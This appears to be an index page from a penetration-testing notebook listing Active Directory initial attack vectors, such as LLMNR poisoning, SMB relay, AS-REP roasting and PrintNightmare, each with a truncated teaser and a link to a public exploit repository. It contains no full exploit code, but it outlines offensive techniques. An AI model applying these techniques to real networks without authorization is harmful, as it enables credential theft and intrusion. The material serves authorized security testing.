Skip to main content

Initial Attack Vectors

Internal:
---------
Attack vectors that are ideal for internal penetration tests, where the attacker plants a device on the network or uploads tools to a compromised host.

External:
---------
Attack vectors that could work in both internal and external penetration tests. Refer to this notebook for tips and tricks on network pivoting, proxying, and port forwarding through compromised hosts:

https://notes.benheater.com/books/network-pivoting

Enumerating Hosts and Identifying the Domain Controllers

Enumerating Live Hosts Internal ARP-Scan Since this is an internal assessment, Kali is on the ...

LLMNR Poisoning (Internal)

Note: Network Environment Given that LLMNR is a name resolution protocol that works on the Local...

SMB Relay (Internal/External)

Note: Network Environment This attack works best in a flat network. However, as long as the atta...

IPv6 DNS Spoofing (Internal)

Note: Network Environment This spoofing attack and works by sending a router announcement to mul...

NULL Session Enumeration (Internal/External)

NULL Session LDAP, SMB, and RPC may allow a user to authenticate to the service without providin...

Using Faketime for Ad-Hoc Kerberos Authentication

Installing Faketime sudo apt install faketime faketime -h This will run the specified 'progr...

Kerberos Pre-Auth Username Enumeration

How it Works We can send a request for a TGT --- without a pre-authentication hash --- to the Ke...

AS-REP Roasting (Internal/External)

AS-REP Roasting If Kerberos pre-authentication is disabled on a user account in Active Directory...

Passback Attacks (Internal/External)

What's the Flaw? Usually involves an unsecure device -- like a printer or multifunction device -...

PrintNightmare (Internal/External)

Remote Code Execution https://github.com/cube0x0/CVE-2021-1675 Contains full details on scannin...

NTLM Credential Stuffing (Internal/External)

NTLM Basic Authentication Could obtain a list of usernames via OSINT, or via something like RI...